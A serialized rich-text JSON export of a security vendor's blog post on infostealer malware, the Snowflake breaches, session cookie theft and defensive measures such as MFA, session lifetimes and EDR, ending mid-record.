",[],{},{"nodeType":254,"data":174906,"content":174907},{},[174908],{"nodeType":178,"data":174909,"content":174910},{},[174911,174916],{"nodeType":173,"value":174912,"marks":174913,"data":174915},"Stolen autofill data",[174914],{"type":370},{},{"nodeType":173,"value":174917,"marks":174918,"data":174919}," can be used to gather other valuable information that could be useful for impersonating the victim when speaking to social engineering IT support staff, for example to reset or remove MFA.",[],{},{"nodeType":178,"data":174921,"content":174922},{},[174923],{"nodeType":173,"value":174924,"marks":174925,"data":174926},"Naturally, stolen session cookies are the most valuable prize, but they are often valid for only a limited time before the user must re-authenticate, and active sessions can often be terminated by security admins. Unfortunately, it’s not that uncommon for sessions to last for up to a month, or even sometimes indefinitely.",[],{},{"nodeType":178,"data":174928,"content":174929},{},[174930],{"nodeType":173,"value":174931,"marks":174932,"data":174933},"Stolen usernames and passwords are a different story. As the Snowflake breaches demonstrate, passwords can remain valid for years after a breach, particularly in the world of SaaS apps where mandatory password rotation is not as common as for a user’s primary domain account.",[],{},{"nodeType":178,"data":174935,"content":174936},{},[174937,174941,174948],{"nodeType":173,"value":174938,"marks":174939,"data":174940},"There’s also the problem of ",[],{},{"nodeType":186,"data":174942,"content":174943},{"uri":4342},[174944],{"nodeType":173,"value":835,"marks":174945,"data":174947},[174946],{"type":194},{},{"nodeType":173,"value":174949,"marks":174950,"data":174951}," – where a local login with a username and password (and probably lacking MFA) can exist alongside other, more secure login methods such as SSO. Given the fact that many apps are self-adopted by users, these accounts continue to exist even when an app is subsequently added to SSO via the chosen IdP, meaning they can fly under the radar of security teams. ",[],{},{"nodeType":231,"data":174953,"content":174954},{},[],{"nodeType":169,"data":174956,"content":174957},{},[174958],{"nodeType":173,"value":174959,"marks":174960,"data":174961},"Should you be concerned about infostealers?",[],{},{"nodeType":178,"data":174963,"content":174964},{},[174965],{"nodeType":173,"value":174966,"marks":174967,"data":174968},"It’s commonly thought that infostealers are primarily a concern for unmanaged devices that lack security controls common to corporate IT, such as EDR. But there’s a couple of reasons why corporate users are also at risk:",[],{},{"nodeType":235,"data":174970,"content":174971},{},[174972],{"nodeType":173,"value":174973,"marks":174974,"data":174975},"EDR can be bypassed",[],{},{"nodeType":178,"data":174977,"content":174978},{},[174979,174983,174992],{"nodeType":173,"value":174980,"marks":174981,"data":174982},"EDR is seen as the go-to solution for defending against infostealer malware. However, attackers are always looking for ways to get around security controls by obfuscating malicious behavior and evading signature-based checks. For example, ",[],{},{"nodeType":186,"data":174984,"content":174986},{"uri":174985},"https://thehackernews.com/2024/07/microsoft-defender-flaw-exploited-to.html",[174987],{"nodeType":173,"value":174988,"marks":174989,"data":174991},"a flaw in Microsoft Defender SmartScreen was recently exploited to deliver infostealer malware",[174990],{"type":194},{},{"nodeType":173,"value":1477,"marks":174993,"data":174994},[],{},{"nodeType":178,"data":174996,"content":174997},{},[174998],{"nodeType":173,"value":174999,"marks":175000,"data":175001},"Getting total coverage across your endpoint estate is notoriously difficult, if not totally unrealistic. Unless the malware is stopped on execution, then data will inevitably be stolen, and will continue to be taken until stopped (or it self-terminates). And once an attacker has stolen employee credentials or sessions, the credential stuffing and session hijacking attacks that come next won’t touch the endpoint. For those reasons, you can’t rely on EDR as a single line of defense against infostealers.",[],{},{"nodeType":235,"data":175003,"content":175004},{},[175005],{"nodeType":173,"value":175006,"marks":175007,"data":175008},"Unmanaged devices such as BYOD or third-parties are vulnerable",[],{},{"nodeType":178,"data":175010,"content":175011},{},[175012],{"nodeType":173,"value":175013,"marks":175014,"data":175015},"Companies that support BYOD often have less secure configurations than those with fully managed devices. The same applies to third-party contractors, who often use their own devices to access company systems on a temporary basis. ",[],{},{"nodeType":178,"data":175017,"content":175018},{},[175019,175023,175030],{"nodeType":173,"value":175020,"marks":175021,"data":175022},"This issue was acutely felt in the Snowflake attacks: There is some suggestion that targeting key third-party suppliers – ",[],{},{"nodeType":186,"data":175024,"content":175025},{"uri":4411},[175026],{"nodeType":173,"value":4417,"marks":175027,"data":175029},[175028],{"type":194},{},{"nodeType":173,"value":175031,"marks":175032,"data":175033}," – yielded some of the access needed. It’s unclear what came first, but it’s possible (likely, even) that EPAM was identified as a target specifically because of its lucrative customer base – third-parties are a known weak point for red teamers, so it would be foolish to assume that attackers don’t also think this way. It’s possible too that EPAM were specifically targeted because of their Snowflake chops – adding another indicator that Snowflake was potentially a premeditated attack inspired by the availability of Snowflake credentials online. ",[],{},{"nodeType":235,"data":175035,"content":175036},{},[175037],{"nodeType":173,"value":175038,"marks":175039,"data":175040},"Browser profiles can be synced across devices, increasing the blast radius",[],{},{"nodeType":178,"data":175042,"content":175043},{},[175044],{"nodeType":173,"value":175045,"marks":175046,"data":175047},"It’s not uncommon for employees to access their personal email accounts from company devices. When accessing any browser, you are typically prompted to sign in with your account credentials (e.g. your Google account). If a user signs into a browser on a company device with a personal account, you’re usually prompted to sync your account across devices. This usually means that any saved passwords, search history, and settings are shared across devices. ",[],{},{"nodeType":178,"data":175049,"content":175050},{},[175051],{"nodeType":173,"value":175052,"marks":175053,"data":175054},"Naturally, this means that if a personal device is compromised where you’re also logged into the browser profile, then an infostealer will be able to harvest information saved into that profile across devices.",[],{},{"nodeType":178,"data":175056,"content":175057},{},[175058],{"nodeType":173,"value":175059,"marks":175060,"data":175061},"Even when using separate browser profiles for work and personal, it’s easy for the two to converge, or to slip into using the wrong profile. Accessing personal accounts (or at least synchronizing data across accounts) is usually a workplace policy violation, but it’s unfortunately all too common. ",[],{},{"nodeType":178,"data":175063,"content":175064},{},[175065,175069,175078],{"nodeType":173,"value":175066,"marks":175067,"data":175068},"Previous vulnerabilities have exacerbated this problem, such as ",[],{},{"nodeType":186,"data":175070,"content":175072},{"uri":175071},"https://thehackernews.com/2024/01/malware-using-google-multilogin-exploit.html",[175073],{"nodeType":173,"value":175074,"marks":175075,"data":175077},"an exploit affecting Google MultiLogin to maintain access to synced accounts even after a password reset",[175076],{"type":194},{},{"nodeType":173,"value":197,"marks":175079,"data":175080},[],{},{"nodeType":235,"data":175082,"content":175083},{},[175084],{"nodeType":173,"value":175085,"marks":175086,"data":175087},"Are infostealers a bigger problem than credential phishing? ",[],{},{"nodeType":178,"data":175089,"content":175090},{},[175091],{"nodeType":173,"value":175092,"marks":175093,"data":175094},"The short answer is: No. The longer answer is: They are both part of the bigger problem of identity attacks, and attackers can wield both approaches simultaneously. ",[],{},{"nodeType":178,"data":175096,"content":175097},{},[175098],{"nodeType":173,"value":175099,"marks":175100,"data":175101},"While they are delivered to victims in similar ways to phishing links, most organizations are arguably better protected against infostealers than modern phishing attacks because endpoint security controls provide another layer of protection, in theory – whereas modern phishing attacks don’t necessarily involve the delivery of malware that executes on the device. ",[],{},{"nodeType":178,"data":175103,"content":175104},{},[175105],{"nodeType":173,"value":175106,"marks":175107,"data":175108},"Infostealers arguably provide more bang for the attacker’s buck, grabbing a stack of credentials and useful data in one go. In contrast, phishing is usually much more targeted, and involves the compromise of a narrower set of credentials – typically focusing on a particular site or app. ",[],{},{"nodeType":178,"data":175110,"content":175111},{},[175112,175116,175124,175128,175134],{"nodeType":173,"value":175113,"marks":175114,"data":175115},"It’s worth focusing on the TTP, not the particular tool being used: The attacker technique here is ",[],{},{"nodeType":186,"data":175117,"content":175118},{"uri":114992},[175119],{"nodeType":173,"value":175120,"marks":175121,"data":175123},"session cookie theft",[175122],{"type":194},{},{"nodeType":173,"value":175125,"marks":175126,"data":175127},", and subsequently session hijacking by importing the cookie into the attacker’s browser. Both infostealers and ",[],{},{"nodeType":186,"data":175129,"content":175130},{"uri":49844},[175131],{"nodeType":173,"value":125798,"marks":175132,"data":175133},[],{},{"nodeType":173,"value":175135,"marks":175136,"data":175137}," involve the theft of session tokens, and so are valid means to achieve this end. In fact, there’s nothing to stop threat groups from employing both simultaneously.",[],{},{"nodeType":312,"data":175139,"content":175143},{"target":175140},{"sys":175141},{"id":175142,"type":317,"linkType":318},"7fil6aaQDFfJGYUnQ14k10",[],{"nodeType":231,"data":175145,"content":175146},{},[],{"nodeType":169,"data":175148,"content":175149},{},[175150],{"nodeType":173,"value":175151,"marks":175152,"data":175153},"Infostealers in action",[],{},{"nodeType":178,"data":175155,"content":175156},{},[175157],{"nodeType":173,"value":175158,"marks":175159,"data":175160},"Check out the video demo below to see the attack chain in action from the point of an infostealer compromise, showing session cookie theft, reimporting the cookies into the attacker's browser, and evading policy-based controls in M365. It also shows the targeting of downstream apps that are usually accessed via SSO in the context of both a Microsoft Entra and Okta compromise.",[],{},{"nodeType":312,"data":175162,"content":175166},{"target":175163},{"sys":175164},{"id":175165,"type":317,"linkType":318},"4J7LqqjQX2W52AbmcVmjUt",[],{"nodeType":169,"data":175168,"content":175169},{},[175170],{"nodeType":173,"value":175171,"marks":175172,"data":175173},"What can organizations do about the infostealer threat? ",[],{},{"nodeType":178,"data":175175,"content":175176},{},[175177],{"nodeType":173,"value":175178,"marks":175179,"data":175180},"Security teams should have two main concerns:",[],{},{"nodeType":250,"data":175182,"content":175183},{},[175184,175194],{"nodeType":254,"data":175185,"content":175186},{},[175187],{"nodeType":178,"data":175188,"content":175189},{},[175190],{"nodeType":173,"value":175191,"marks":175192,"data":175193},"Data that is already out there from historical data dumps, but is still valid. ",[],{},{"nodeType":254,"data":175195,"content":175196},{},[175197],{"nodeType":178,"data":175198,"content":175199},{},[175200],{"nodeType":173,"value":175201,"marks":175202,"data":175203},"Data in private channels that attackers could use in the future, that you are blind to. ",[],{},{"nodeType":178,"data":175205,"content":175206},{},[175207],{"nodeType":173,"value":175208,"marks":175209,"data":175210},"As always, the root-cause of the problem is a lack of meaningful visibility of what apps your employees are using (including those outside your IdP) and whether the associated identities are configured securely. ",[],{},{"nodeType":178,"data":175212,"content":175213},{},[175214],{"nodeType":173,"value":175215,"marks":175216,"data":175217},"A layered, defense-in-depth approach is required to resolve the issue, by:",[],{},{"nodeType":250,"data":175219,"content":175220},{},[175221,175231,175241,175251],{"nodeType":254,"data":175222,"content":175223},{},[175224],{"nodeType":178,"data":175225,"content":175226},{},[175227],{"nodeType":173,"value":175228,"marks":175229,"data":175230},"Deploying MFA across all your identities and apps, including any local logins that can’t be put behind SSO. ",[],{},{"nodeType":254,"data":175232,"content":175233},{},[175234],{"nodeType":178,"data":175235,"content":175236},{},[175237],{"nodeType":173,"value":175238,"marks":175239,"data":175240},"Configuring time-limited session lifetimes for all apps to ensure that any stolen session tokens can only be used temporarily. ",[],{},{"nodeType":254,"data":175242,"content":175243},{},[175244],{"nodeType":178,"data":175245,"content":175246},{},[175247],{"nodeType":173,"value":175248,"marks":175249,"data":175250},"Ensuring that employees don’t access or synchronize personal accounts on their work devices, as well as limiting non-work activities on their work device as much as possible.",[],{},{"nodeType":254,"data":175252,"content":175253},{},[175254],{"nodeType":178,"data":175255,"content":175256},{},[175257],{"nodeType":173,"value":175258,"marks":175259,"data":175260},"Implementing a robust EDR/MDR solution to detect and respond to malware compromises on user devices. ",[],{},{"nodeType":178,"data":175262,"content":175263},{},[175264,175268,175273],{"nodeType":173,"value":175265,"marks":175266,"data":175267},"Organizations also have the option of investing in a commercial TI feed to detect and report data breaches affecting employees. But in our experience, these feeds contain ",[],{},{"nodeType":173,"value":175269,"marks":175270,"data":175272},"a lot ",[175271],{"type":370},{},{"nodeType":173,"value":175274,"marks":175275,"data":175276},"of false positives – so unless you have password visibility for employee accounts across apps, it’s going to waste a chunk of valuable time for you and your employees.",[],{},{"nodeType":178,"data":175278,"content":175279},{},[175280,175284,175292],{"nodeType":173,"value":175281,"marks":175282,"data":175283},"It would be remiss of us not to mention our recently released ",[],{},{"nodeType":186,"data":175285,"content":175286},{"uri":4751},[175287],{"nodeType":173,"value":175288,"marks":175289,"data":175291},"session token theft detection feature",[175290],{"type":194},{},{"nodeType":173,"value":175293,"marks":175294,"data":175295}," that identifies session token theft by adding telemetry to the user agent string – using the power of our browser agent to create a new high-fidelity signal for security teams. It can also be applied more generally to detect any session taking place in an unmanaged browser – so you can use it to spot unauthorized access to company apps in general, too.  ",[],{},{"nodeType":312,"data":175297,"content":175301},{"target":175298},{"sys":175299},{"id":175300,"type":317,"linkType":318},"3XgpqEGzZSD2J0uvnCg5D8",[],{"nodeType":235,"data":175303,"content":175304},{},[175305],{"nodeType":173,"value":175306,"marks":175307,"data":175308},"What’s next for infostealers?",[],{},{"nodeType":178,"data":175310,"content":175311},{},[175312],{"nodeType":173,"value":175313,"marks":175314,"data":175315},"All the signs point to the fact that infostealers will continue being a useful tool in the attacker’s arsenal. The Snowflake attacks in particular are both a warning for defenders and encouragement for attackers. It's also a good reminder that while infostealers were once used to harvest things like VPN creds to pivot to the internal network, they're now largely used to target third-party services over the internet. ",[],{},{"nodeType":178,"data":175317,"content":175318},{},[175319],{"nodeType":173,"value":175320,"marks":175321,"data":175322},"To evade EDR, it’s likely that we’ll see a growing number of families and variants used by individual groups, or better ‘enterprise’ capabilities from malware-as-a-service vendors. ",[],{},{"nodeType":178,"data":175324,"content":175325},{},[175326,175330,175339,175343,175351],{"nodeType":173,"value":175327,"marks":175328,"data":175329},"One notable quirk is that, to date, infostealers have not really branched out from targeting browsers. Take the example of password manager apps – you would think this would be an obvious target, right? But, they’re not usually targeted (",[],{},{"nodeType":186,"data":175331,"content":175333},{"uri":175332},"https://securitysenses.com/posts/malware-targeting-password-managers",[175334],{"nodeType":173,"value":175335,"marks":175336,"data":175338},"with some exceptions",[175337],{"type":194},{},{"nodeType":173,"value":175340,"marks":175341,"data":175342},"). And when they do, ",[],{},{"nodeType":186,"data":175344,"content":175345},{"uri":175332},[175346],{"nodeType":173,"value":175347,"marks":175348,"data":175350},"they work by eavesdropping on the password manager’s browser extension in action",[175349],{"type":194},{},{"nodeType":173,"value":175352,"marks":175353,"data":175354}," – meaning they are intercepted one-at-a-time as the user uses them, rather than targeting the password manager directly and exporting the saved passwords all at once. It will be interesting to see whether these capabilities are added in the future. ",[],{},{"nodeType":178,"data":175356,"content":175357},{},[175358,175362,175371,175374,175383,175387,175396],{"nodeType":173,"value":175359,"marks":175360,"data":175361},"On the other hand, there are defensive security developments that could reduce the ability of attackers to leverage things like stolen session tokens, such as ",[],{},{"nodeType":186,"data":175363,"content":175365},{"uri":175364},"https://learn.microsoft.com/en-us/entra/identity/conditional-access/concept-token-protection",[175366],{"nodeType":173,"value":175367,"marks":175368,"data":175370},"Microsoft’s token binding feature in Entra",[175369],{"type":194},{},{"nodeType":173,"value":3949,"marks":175372,"data":175373},[],{},{"nodeType":186,"data":175375,"content":175377},{"uri":175376},"https://blog.chromium.org/2024/04/fighting-cookie-theft-using-device.html",[175378],{"nodeType":173,"value":175379,"marks":175380,"data":175382},"Google’s device bound session cookies",[175381],{"type":194},{},{"nodeType":173,"value":175384,"marks":175385,"data":175386},". Google also released an ",[],{},{"nodeType":186,"data":175388,"content":175390},{"uri":175389},"https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html?m=1",[175391],{"nodeType":173,"value":175392,"marks":175393,"data":175395},"app-bound encryption feature",[175394],{"type":194},{},{"nodeType":173,"value":175397,"marks":175398,"data":175399},", which adds additional protection against infostealers attempting to steal browser data in Chrome if the underlying Windows device is compromised. ",[],{},{"nodeType":178,"data":175401,"content":175402},{},[175403],{"nodeType":173,"value":175404,"marks":175405,"data":175406},"That said, mature versions of these controls are still years away, and while session cookie theft is a key risk of infostealers, it’s not the only risk – so alternative controls and mitigations remain valuable to security teams in the present. ",[],{},{"nodeType":312,"data":175408,"content":175412},{"target":175409},{"sys":175410},{"id":175411,"type":317,"linkType":318},"5loTnpvwGD3kaKMXBp23hZ",[],{"nodeType":178,"data":175414,"content":175415},{},[175416],{"nodeType":173,"value":37,"marks":175417,"data":175418},[],{},"What the rise in popularity of infostealers tells us about the cybercrime ecosystem and the shift toward identity attacks. ","2024-07-31T00:00:00.000Z",{"items":175422},[175423,175425],{"sys":175424,"name":505},{"id":504},{"sys":175426,"name":509},{"id":508},{"items":175428},[175429],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":175430},{"url":1496},{"items":175432},[175433],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":175434},{"url":2911},{"json":175436,"links":176037},{"nodeType":165,"data":175437,"content":175438},{},[175439,175444,175447,175460,175466,175472,175477,175483,175499,175514,175520,175525,175531,175534,175540,175546,175552,175558,175564,175570,175599,175604,175610,175613,175619,175625,175723,175729,175745,175751,175767,175773,175790,175796,175812,175815,175821,175827,175833,175859,175865,175871,175886,175891,175897,175903,175908,175914,175971,175977,175983,175989,175995,176001,176004,176010,176026,176031],{"nodeType":312,"data":175440,"content":175443},{"target":175441},{"sys":175442},{"id":154952,"type":317,"linkType":318},[],{"nodeType":231,"data":175445,"content":175446},{},[],{"nodeType":178,"data":175448,"content":175449},{},[175450,175453,175457],{"nodeType":173,"value":154961,"marks":175451,"data":175452},[],{},{"nodeType":173,"value":154965,"marks":175454,"data":175456},[175455],{"type":1646},{},{"nodeType":173,"value":154970,"marks":175458,"data":175459},[],{},{"nodeType":178,"data":175461,"content":175462},{},[175463],{"nodeType":173,"value":154977,"marks":175464,"data":175465},[],{},{"nodeType":178,"data":175467,"content":175468},{},[175469],{"nodeType":173,"value":154984,"marks":175470,"data":175471},[],{},{"nodeType":312,"data":175473,"content":175476},{"target":175474},{"sys":175475},{"id":154991,"type":317,"linkType":318},[],{"nodeType":178,"data":175478,"content":175479},{},[175480],{"nodeType":173,"value":154997,"marks":175481,"data":175482},[],{},{"nodeType":3769,"data":175484,"content":175485},{},[175486],{"nodeType":178,"data":175487,"content":175488},{},[175489,175492,175496],{"nodeType":173,"value":155007,"marks":175490,"data":175491},[],{},{"nodeType":173,"value":155011,"marks":175493,"data":175495},[175494],{"type":370},{},{"nodeType":173,"value":2340,"marks":175497,"data":175498},[],{},{"nodeType":178,"data":175500,"content":175501},{},[175502,175505,175511],{"nodeType":173,"value":155022,"marks":175503,"data":175504},[],{},{"nodeType":186,"data":175506,"content":175507},{"uri":155027},[175508],{"nodeType":173,"value":155030,"marks":175509,"data":175510},[],{},{"nodeType":173,"value":155034,"marks":175512,"data":175513},[],{},{"nodeType":178,"data":175515,"content":175516},{},[175517],{"nodeType":173,"value":155041,"marks":175518,"data":175519},[],{},{"nodeType":312,"data":175521,"content":175524},{"target":175522},{"sys":175523},{"id":155048,"type":317,"linkType":318},[],{"nodeType":178,"data":175526,"content":175527},{},[175528],{"nodeType":173,"value":155054,"marks":175529,"data":175530},[],{},{"nodeType":231,"data":175532,"content":175533},{},[],{"nodeType":169,"data":175535,"content":175536},{},[175537],{"nodeType":173,"value":155064,"marks":175538,"data":175539},[],{},{"nodeType":178,"data":175541,"content":175542},{},[175543],{"nodeType":173,"value":155071,"marks":175544,"data":175545},[],{},{"nodeType":178,"data":175547,"content":175548},{},[175549],{"nodeType":173,"value":155078,"marks":175550,"data":175551},[],{},{"nodeType":235,"data":175553,"content":175554},{},[175555],{"nodeType":173,"value":155085,"marks":175556,"data":175557},[],{},{"nodeType":178,"data":175559,"content":175560},{},[175561],{"nodeType":173,"value":155092,"marks":175562,"data":175563},[],{},{"nodeType":178,"data":175565,"content":175566},{},[175567],{"nodeType":173,"value":155099,"marks":175568,"data":175569},[],{},{"nodeType":250,"data":175571,"content":175572},{},[175573,175586],{"nodeType":254,"data":175574,"content":175575},{},[175576],{"nodeType":178,"data":175577,"content":175578},{},[175579,175583],{"nodeType":173,"value":155112,"marks":175580,"data":175582},[175581],{"type":370},{},{"nodeType":173,"value":155117,"marks":175584,"data":175585},[],{},{"nodeType":254,"data":175587,"content":175588},{},[175589],{"nodeType":178,"data":175590,"content":175591},{},[175592,175596],{"nodeType":173,"value":155127,"marks":175593,"data":175595},[175594],{"type":370},{},{"nodeType":173,"value":155132,"marks":175597,"data":175598},[],{},{"nodeType":312,"data":175600,"content":175603},{"target":175601},{"sys":175602},{"id":155139,"type":317,"linkType":318},[],{"nodeType":178,"data":175605,"content":175606},{},[175607],{"nodeType":173,"value":155145,"marks":175608,"data":175609},[],{},{"nodeType":231,"data":175611,"content":175612},{},[],{"nodeType":169,"data":175614,"content":175615},{},[175616],{"nodeType":173,"value":155155,"marks":175617,"data":175618},[],{},{"nodeType":178,"data":175620,"content":175621},{},[175622],{"nodeType":173,"value":155162,"marks":175623,"data":175624},[],{},{"nodeType":250,"data":175626,"content":175627},{},[175628,175647,175666,175685,175714],{"nodeType":254,"data":175629,"content":175630},{},[175631],{"nodeType":178,"data":175632,"content":175633},{},[175634,175637,175644],{"nodeType":173,"value":5039,"marks":175635,"data":175636},[],{},{"nodeType":186,"data":175638,"content":175639},{"uri":125982},[175640],{"nodeType":173,"value":155181,"marks":175641,"data":175643},[175642],{"type":194},{},{"nodeType":173,"value":155186,"marks":175645,"data":175646},[],{},{"nodeType":254,"data":175648,"content":175649},{},[175650],{"nodeType":178,"data":175651,"content":175652},{},[175653,175656,175663],{"nodeType":173,"value":37,"marks":175654,"data":175655},[],{},{"nodeType":186,"data":175657,"content":175658},{"uri":155200},[175659],{"nodeType":173,"value":155203,"marks":175660,"data":175662},[175661],{"type":194},{},{"nodeType":173,"value":155208,"marks":175664,"data":175665},[],{},{"nodeType":254,"data":175667,"content":175668},{},[175669],{"nodeType":178,"data":175670,"content":175671},{},[175672,175675,175682],{"nodeType":173,"value":155218,"marks":175673,"data":175674},[],{},{"nodeType":186,"data":175676,"content":175677},{"uri":155223},[175678],{"nodeType":173,"value":155226,"marks":175679,"data":175681},[175680],{"type":194},{},{"nodeType":173,"value":155231,"marks":175683,"data":175684},[],{},{"nodeType":254,"data":175686,"content":175687},{},[175688],{"nodeType":178,"data":175689,"content":175690},{},[175691,175694,175701,175704,175711],{"nodeType":173,"value":155241,"marks":175692,"data":175693},[],{},{"nodeType":186,"data":175695,"content":175696},{"uri":155246},[175697],{"nodeType":173,"value":155249,"marks":175698,"data":175700},[175699],{"type":194},{},{"nodeType":173,"value":155254,"marks":175702,"data":175703},[],{},{"nodeType":186,"data":175705,"content":175706},{"uri":155259},[175707],{"nodeType":173,"value":155262,"marks":175708,"data":175710},[175709],{"type":194},{},{"nodeType":173,"value":155267,"marks":175712,"data":175713},[],{},{"nodeType":254,"data":175715,"content":175716},{},[175717],{"nodeType":178,"data":175718,"content":175719},{},[175720],{"nodeType":173,"value":155277,"marks":175721,"data":175722},[],{},{"nodeType":178,"data":175724,"content":175725},{},[175726],{"nodeType":173,"value":155284,"marks":175727,"data":175728},[],{},{"nodeType":178,"data":175730,"content":175731},{},[175732,175735,175742],{"nodeType":173,"value":37,"marks":175733,"data":175734},[],{},{"nodeType":186,"data":175736,"content":175737},{"uri":155200},[175738],{"nodeType":173,"value":155297,"marks":175739,"data":175741},[175740],{"type":194},{},{"nodeType":173,"value":155302,"marks":175743,"data":175744},[],{},{"nodeType":235,"data":175746,"content":175747},{},[175748],{"nodeType":173,"value":155309,"marks":175749,"data":175750},[],{},{"nodeType":178,"data":175752,"content":175753},{},[175754,175757,175764],{"nodeType":173,"value":155316,"marks":175755,"data":175756},[],{},{"nodeType":186,"data":175758,"content":175759},{"uri":126102},[175760],{"nodeType":173,"value":155323,"marks":175761,"data":175763},[175762],{"type":194},{},{"nodeType":173,"value":1477,"marks":175765,"data":175766},[],{},{"nodeType":178,"data":175768,"content":175769},{},[175770],{"nodeType":173,"value":155334,"marks":175771,"data":175772},[],{},{"nodeType":178,"data":175774,"content":175775},{},[175776,175779,175787],{"nodeType":173,"value":155341,"marks":175777,"data":175778},[],{},{"nodeType":186,"data":175780,"content":175781},{"uri":81621},[175782],{"nodeType":173,"value":155348,"marks":175783,"data":175786},[175784,175785],{"type":194},{"type":370},{},{"nodeType":173,"value":155354,"marks":175788,"data":175789},[],{},{"nodeType":178,"data":175791,"content":175792},{},[175793],{"nodeType":173,"value":155361,"marks":175794,"data":175795},[],{},{"nodeType":178,"data":175797,"content":175798},{},[175799,175802,175809],{"nodeType":173,"value":155368,"marks":175800,"data":175801},[],{},{"nodeType":186,"data":175803,"content":175804},{"uri":4492},[175805],{"nodeType":173,"value":111468,"marks":175806,"data":175808},[175807],{"type":194},{},{"nodeType":173,"value":155379,"marks":175810,"data":175811},[],{},{"nodeType":231,"data":175813,"content":175814},{},[],{"nodeType":169,"data":175816,"content":175817},{},[175818],{"nodeType":173,"value":155389,"marks":175819,"data":175820},[],{},{"nodeType":178,"data":175822,"content":175823},{},[175824],{"nodeType":173,"value":155396,"marks":175825,"data":175826},[],{},{"nodeType":178,"data":175828,"content":175829},{},[175830],{"nodeType":173,"value":155403,"marks":175831,"data":175832},[],{},{"nodeType":178,"data":175834,"content":175835},{},[175836,175839,175846,175849,175856],{"nodeType":173,"value":155410,"marks":175837,"data":175838},[],{},{"nodeType":186,"data":175840,"content":175841},{"uri":155415},[175842],{"nodeType":173,"value":155418,"marks":175843,"data":175845},[175844],{"type":194},{},{"nodeType":173,"value":155423,"marks":175847,"data":175848},[],{},{"nodeType":186,"data":175850,"content":175851},{"uri":111913},[175852],{"nodeType":173,"value":155430,"marks":175853,"data":175855},[175854],{"type":194},{},{"nodeType":173,"value":155435,"marks":175857,"data":175858},[],{},{"nodeType":178,"data":175860,"content":175861},{},[175862],{"nodeType":173,"value":155442,"marks":175863,"data":175864},[],{},{"nodeType":178,"data":175866,"content":175867},{},[175868],{"nodeType":173,"value":155449,"marks":175869,"data":175870},[],{},{"nodeType":178,"data":175872,"content":175873},{},[175874,175877,175883],{"nodeType":173,"value":155456,"marks":175875,"data":175876},[],{},{"nodeType":186,"data":175878,"content":175879},{"uri":819},[175880],{"nodeType":173,"value":155463,"marks":175881,"data":175882},[],{},{"nodeType":173,"value":155467,"marks":175884,"data":175885},[],{},{"nodeType":312,"data":175887,"content":175890},{"target":175888},{"sys":175889},{"id":155474,"type":317,"linkType":318},[],{"nodeType":235,"data":175892,"content":175893},{},[175894],{"nodeType":173,"value":155480,"marks":175895,"data":175896},[],{},{"nodeType":178,"data":175898,"content":175899},{},[175900],{"nodeType":173,"value":155487,"marks":175901,"data":175902},[],{},{"nodeType":312,"data":175904,"content":175907},{"target":175905},{"sys":175906},{"id":155494,"type":317,"linkType":318},[],{"nodeType":178,"data":175909,"content":175910},{},[175911],{"nodeType":173,"value":100610,"marks":175912,"data":175913},[],{},{"nodeType":250,"data":175915,"content":175916},{},[175917,175935,175944,175953,175962],{"nodeType":254,"data":175918,"content":175919},{},[175920],{"nodeType":178,"data":175921,"content":175922},{},[175923,175926,175932],{"nodeType":173,"value":155512,"marks":175924,"data":175925},[],{},{"nodeType":186,"data":175927,"content":175928},{"uri":155517},[175929],{"nodeType":173,"value":155030,"marks":175930,"data":175931},[],{},{"nodeType":173,"value":2340,"marks":175933,"data":175934},[],{},{"nodeType":254,"data":175936,"content":175937},{},[175938],{"nodeType":178,"data":175939,"content":175940},{},[175941],{"nodeType":173,"value":155532,"marks":175942,"data":175943},[],{},{"nodeType":254,"data":175945,"content":175946},{},[175947],{"nodeType":178,"data":175948,"content":175949},{},[175950],{"nodeType":173,"value":155542,"marks":175951,"data":175952},[],{},{"nodeType":254,"data":175954,"content":175955},{},[175956],{"nodeType":178,"data":175957,"content":175958},{},[175959],{"nodeType":173,"value":155552,"marks":175960,"data":175961},[],{},{"nodeType":254,"data":175963,"content":175964},{},[175965],{"nodeType":178,"data":175966,"content":175967},{},[175968],{"nodeType":173,"value":105070,"marks":175969,"data":175970},[],{},{"nodeType":178,"data":175972,"content":175973},{},[175974],{"nodeType":173,"value":155568,"marks":175975,"data":175976},[],{},{"nodeType":178,"data":175978,"content":175979},{},[175980],{"nodeType":173,"value":155575,"marks":175981,"data":175982},[],{},{"nodeType":235,"data":175984,"content":175985},{},[175986],{"nodeType":173,"value":155582,"marks":175987,"data":175988},[],{},{"nodeType":178,"data":175990,"content":175991},{},[175992],{"nodeType":173,"value":155589,"marks":175993,"data":175994},[],{},{"nodeType":178,"data":175996,"content":175997},{},[175998],{"nodeType":173,"value":155596,"marks":175999,"data":176000},[],{},{"nodeType":231,"data":176002,"content":176003},{},[],{"nodeType":169,"data":176005,"content":176006},{},[176007],{"nodeType":173,"value":155606,"marks":176008,"data":176009},[],{},{"nodeType":178,"data":176011,"content":176012},{},[176013,176016,176023],{"nodeType":173,"value":155613,"marks":176014,"data":176015},[],{},{"nodeType":186,"data":176017,"content":176018},{"uri":473},[176019],{"nodeType":173,"value":71815,"marks":176020,"data":176022},[176021],{"type":194},{},{"nodeType":173,"value":197,"marks":176024,"data":176025},[],{},{"nodeType":312,"data":176027,"content":176030},{"target":176028},{"sys":176029},{"id":4766,"type":317,"linkType":318},[],{"nodeType":178,"data":176032,"content":176033},{},[176034],{"nodeType":173,"value":37,"marks":176035,"data":176036},[],{},{"entries":176038},{"hyperlink":176039,"inline":176040,"block":176041},[],[],[176042,176048,176075,176080,176105,176109,176116],{"sys":176043,"__typename":127689,"title":176044,"youTubeUrl":176045,"imagePlaceholder":176046},{"id":154952},"Feature release video: Verified stolen credential detection","https://youtu.be/r495-LOM5yk?si=TJW2tD90p2GDhcOs",{"url":176047,"width":121106,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/4rLviLJBsHZ8C1DCK37nZq/051eb54c244784f1662fd166568f4423/Youtube_Video_Thumbnail_V1__1_.png",{"sys":176049,"__typename":5311,"content":176050,"name":176074,"title":118},{"id":154991},{"json":176051},{"nodeType":165,"data":176052,"content":176053},{},[176054],{"nodeType":178,"data":176055,"content":176056},{},[176057,176061,176065,176070],{"nodeType":173,"value":176058,"marks":176059,"data":176060},"A",[],{},{"nodeType":173,"value":176062,"marks":176063,"data":176064}," recent review of TI data by Push researchers found that ",[],{},{"nodeType":173,"value":176066,"marks":176067,"data":176069},"less than 1% of stolen 